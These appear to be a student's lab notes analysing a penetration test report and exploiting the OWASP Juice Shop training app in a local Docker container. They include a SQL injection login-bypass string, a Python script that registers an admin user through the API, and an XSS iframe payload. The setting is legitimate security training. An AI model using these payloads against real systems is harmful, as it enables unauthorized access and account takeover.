Pen_Test_Report_Analysis.
md 04/07/2022
Pen Test Report Analysis
1. Pen Test Report Structure
EXECUTIVE SUMMARY
The Executive Summary as title already states a summary for the higher management. So the
do not have to read the whole report with all it's technical details. It's a synopsis with all important
findings and the corresponding actions.
NARRATIVE AND ACTIVITY LOG
The pentester company explains the methodology and the scope of their work. What they have
done and what not and also why. It is a nearly complete blueprint of there actions and also some
findings.
FINDINGS AND RECOMMENDATIONS
In this section we will get the outlines and adversary for the proceedings steps.
RISK RATINGS
In order to be able to understand the classifications, they are explained in more detail
here.
FINDINGS SUMMARY
The findings are divide into critical, high, medium and low risks. Each rating will be
explained in detail. There's also an overview of the risks.
HIGH RISK FINDINGS
Here are all the high risk findings
MEDIUM RISK FINDINGS
Here are all the medium risk findings
LOW RISK FINDINGS
Here are all the low risk findings
STRATEGIC GUIDANCE
an outlinging what the pentester company would take as actions from the report
2. Attacking the Juice Shop
1/6
�Pen_Test_Report_Analysis.md 04/07/2022
docker pull bkimminich/juice-shop
docker run --rm -p 3000:3000 bkimminich/juice-shop
1. SQL Injection Flaws
1. The report suggest the following code to login with Using the parameters ‘ = OR
1=1-- , as the usernam and any password -> It's not working anymore as in the
script.
2. It works wenn you quote it and change it a little bit
"' OR 1=1; --"
2. Authorization Bypass
#!/usr/bin/python3
import requests
r = requests.post('http://172.17.0.2:3000//api/Users/', json=
{"email":"admin","password":"admin","role":"admin"})
print(f"Status Code: {r.status_code}, Response: {r.json()}")
2/6
�Pen_Test_Report_Analysis.md 04/07/2022
3. Cross-Site Scripting Flaws The url is sanititized as you see in the picture below
http://172.17.0.2:3000/#/track-result?
id=%3Ciframe%20src=%22javascript:alert(%60xss%60)%22%3E
4. Access to Encryption Keys
5. Look now at the broken authentication demo at https://demo.owasp-juice.shop/#/hacking-
instructor?challenge=Password%20Strength And reflect of you want to strengthen the
recommendation in the report. The Md5 Hash is easy Crackable with https://crackstation.net/ so
a stronger encryption like sha256 is needed.
3. Snyk
1. Cross-site Scripting (XSS)
3/6
�Pen_Test_Report_Analysis.md 04/07/2022
Because it's a high severity and it's at the third place in the owasp 2021 (A03:2021-Injection)
2. NoSQL Injection
Because it's a high severity and it's at the third place in the owasp 2021 (A03:2021-Injection)
3. Regular Expression Denial of Service (ReDoS)
Because it's a high severity
4. SQL Injection
4/6
�Pen_Test_Report_Analysis.md 04/07/2022
Because it's a high severity and you can extract the database
5. Code Injection
Because it's a high severity and can run coe on the server and take over the whole host.
6. Hardcoded Secret
Because it's a high severity
7. Server-Side Request Forgery (SSRF)
Because it's a high severity and at thenth place in the owasp top ten (A10:2021-Server-Side
Request Forgery )
5/6
�Pen_Test_Report_Analysis.md 04/07/2022
6/6
